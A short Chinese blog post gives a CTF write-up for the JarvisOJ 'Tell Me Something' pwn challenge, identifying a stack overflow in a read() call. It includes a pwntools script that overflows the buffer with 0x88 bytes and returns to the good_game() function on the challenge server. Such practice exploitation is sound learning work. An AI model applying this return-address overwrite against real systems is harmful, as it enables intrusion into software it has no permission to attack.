[JarvisOj][XMAN]lTell Me Something

除了NX。。估计还是栈溢出

 

 发现还是一样的read函数。

继续分析

于是只需要让他返回到good_game()的地址就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
 
 
 
sh = remote("pwn.jarvisoj.com",9876)
 
 
 
payload = '\x00'*0x88 + p64(0x0000000000400620)
 
 
 
sh.recvuntil("message:\n")
 
sh.sendline(payload)
 
print sh.recvline()
 
print sh.recvline()

 

posted @   轩x  阅读(304)  评论(0编辑  收藏  举报
编辑推荐:
· .NET Core 托管堆内存泄露/CPU异常的常见思路
· PostgreSQL 和 SQL Server 在统计信息维护中的关键差异
· C++代码改造为UTF-8编码问题的总结
· DeepSeek 解答了困扰我五年的技术问题
· 为什么说在企业级应用开发中,后端往往是效率杀手?
阅读排行:
· 清华大学推出第四讲使用 DeepSeek + DeepResearch 让科研像聊天一样简单!
· 推荐几款开源且免费的 .NET MAUI 组件库
· 实操Deepseek接入个人知识库
· 易语言 —— 开山篇
· Trae初体验
点击右上角即可分享
微信分享提示